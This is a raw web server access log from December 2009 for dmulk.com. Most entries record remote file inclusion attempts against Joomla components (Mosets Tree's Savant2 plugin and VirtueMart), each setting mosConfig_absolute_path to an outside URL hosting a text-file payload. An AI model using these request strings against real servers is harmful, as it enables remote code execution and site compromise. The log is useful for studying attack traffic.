116.50.134.6 - - [14/Dec/2009:08:57:02 -0800] "GET /logs/access_080410.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:08:57:37 -0800] "GET /logs/access_090415.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:08:57:37 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [14/Dec/2009:08:57:41 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
92.50.143.90 - - [14/Dec/2009:08:57:41 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 200 14919 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:08:57:44 -0800] "GET /logs/access_090408.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
